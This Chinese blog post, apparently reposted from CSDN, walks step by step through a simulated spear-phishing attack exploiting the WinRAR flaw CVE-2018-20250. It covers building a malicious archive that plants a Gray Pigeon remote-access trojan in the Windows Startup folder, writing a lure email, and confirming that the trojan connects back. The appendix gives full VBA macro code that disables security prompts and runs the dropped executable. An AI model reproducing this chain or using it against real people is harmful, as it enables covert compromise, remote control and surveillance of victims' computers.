利用漏洞CVE-2018-20250模拟一次鱼叉式钓鱼邮件攻击
作者:互联网
利用漏洞CVE-2018-20250模拟一次鱼叉式钓鱼邮件攻击
1 概述
我们将向目标发送一封带有附件的钓鱼邮件,该附件是一个rar压缩包,该压缩包是利用CVE-2018-20250漏洞压缩而成的,包含有一些正常的具有迷惑性的txt文件等、一个具有恶意宏代码并启用宏的docm文档、灰鸽子服务端程序。
当目标收到邮件,将(被诱导)进行以下操作:
(1)将附件rar压缩文件保存在C:\Users[当前用户]…类似目录下(如桌面目录C:\Users[当前用户]\Desktop);
(2)使用仍未修复相关漏洞的旧版本解压缩工具(如WinRAR 5.61及更老版本)来解压缩该压缩包,打开压缩包进行预览时只能看到一些正常的txt文件等以及一个名字具有诱惑性的docm文件,而灰鸽子服务端程序被隐藏在一个很深的目录下,目标默认将文件解压到压缩包同一目录下(即桌面),桌面上只能看到一个包含正常txt文件等及docm文件的文件夹,而灰鸽子服务端程序则因触发漏洞而被解压到 “C:\Users[当前用户]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\” 下(即系统开机自启动目录),并被命名为hi.exe。
(3)目标被诱导点开docm文档并同意启用宏,宏代码自动运行获取用户文件目录“C:\Users[用户名]”并形成hi.exe所在路径,然后运行hi.exe,灰鸽子安装成功,目标上线。
之所以将hi.exe放入了自启动目录但我们仍要使用宏代码直接运行,是担心目标系统长时间不关机(只休眠),让目标立即上线免得攻击方还需要一直等待。
2 实现流程:
由概述中所描述的内容,我们可以将这次任务分成三方面的工作:docm的编写、压缩包的形成、邮件的编写。
2.1 具有恶意宏代码的docm文档编写
将代码写在 AutoOpen() 下,使代码能够在目标打开docm文档时就自动运行。
首先还是恶意宏代码的自我保护部分,虽然这个宏里要写的代码很少,但还是加上为好。
弹个对话框,象征恶意宏代码开始运行。
由概述中所说,我们要运行的hi.exe保存在“C:\Users[当前用户]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\”目录下,因此先需要获取当前用户文件目录(或用户名)。
调用Environ()函数,获取用户文件目录USERPROFILE。
拼接字符串获得hi.exe的完整路径。
使用Shell()函数运行该exe文件。
2.2 利用CVE-2018-20250形成ACE压缩包
利用该漏洞形成ACE压缩包的代码地址为:https://github.com/WyAtu/CVE-2018-20250,该工程的目录如下:
该漏洞存在于压缩工具使用的UNACEV2.dll中,acefile.py是利用该漏洞的代码;exp.py是调用acefile.py将恶意代码和用于迷惑目标的文件压缩在一起的代码;calc.exe在这里作为恶意代码;hello.txt和world.txt都是会被压进压缩包的无恶意迷惑性文件。
我们先使用灰鸽子生成一个服务端程序,点击“配置服务程序”。
填写控制端IP地址。这里是在局域网内进行攻击,如果不在局域网内,需要做内网端口映射,将攻击端的内网地址映射成外网地址的一个端口。
安装选项中按照需求自行选择。
然后点击“生成服务器”生成服务端程序。
然后我们将Server.exe和刚写好的docm文件都复制到漏洞利用代码的同一目录下,现在该目录的内容如下:
此外,我们需要稍微修改下exp.py,evil_filename是要添加进去的恶意代码路径,filename_list是需要一起加进去的迷惑性文件,我们把编写的docm文件也假装成一个正常文档加进去。rar_filename是最后形成的rar文件名,可改成更合适钓鱼的文件名。
还需要修改一下os.popen()中的参数,作者运行代码的环境为python 3.7,,使用“py -3 [filename] …”运行py文件,而我这里需要使用“python [filename] …”(这应该是环境变量设置的问题)运行。
运行代码生成rar文件。
2.3 邮件编写
将上面形成的rar作为附件添加,填入合适的主题和内容,然后加一句关于附件保存路径的提醒(该漏洞的利用要求目标将附件保存在“C:\Users[当前用户]…”下)。
3 演示
攻击方操作系统: Windows 7 x64
攻击方IP地址: 192.168.197.131
被攻击方操作系统: Windows 7 x64
被攻击方解压缩工具: WinRAR 5.61
被攻击方已收到邮件,并按注释所说将附件保存在桌面。
打开压缩包查看,没有什么恶意代码迹象。
解压到默认目录(即压缩包同一目录下,即桌面)。
目标打开docm文档。
弹出“Hello!”对话框,意味着恶意宏代码已自动正常执行。点击确定。
查看攻击端灰鸽子。
看到服务端上线,能够查看到桌面上有test.rar,也能够进行其他灰鸽子支持的操作(如捕获屏幕、视频语音等)。
4 附录
附VBA代码:
Sub AutoOpen()
On Error Resume Next '如果发生错误,不弹出出错窗口,继续执行下面语句
Application.DisplayAlerts = wdAlertsNone '不弹出警告窗口
Application.DisplayStatusBar = False '不显示状态栏,以免显示宏的运行状态
Options.VirusProtection = False '关闭病毒保护功能,运行前如果包含宏,不提示
Options.SaveNormalPrompt = False '如果公用模块被修改,不给用户提示窗口而直接保存
Application.ScreenUpdating = False '不让刷新屏幕,以免病毒运行引起速度变慢
Application.EnableCancelKey = wdCancelDisabled '不允许通过ESC键结束正在运行的宏
MsgBox ("Hello!")
Dim UserProFile
UserProFile = Environ("USERPROFILE") '获取用户文件目录:C:\Users\***
Dim Path
Path = UserProFile + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe" '被保存在自启动目录下的恶意代码路径
Shell (Path) '运行恶意代码
End Sub
标签:exe,宏代码,20250,灰鸽子,2018,docm,CVE,目录,压缩包 来源: https://blog.csdn.net/qq_43443410/article/details/118974959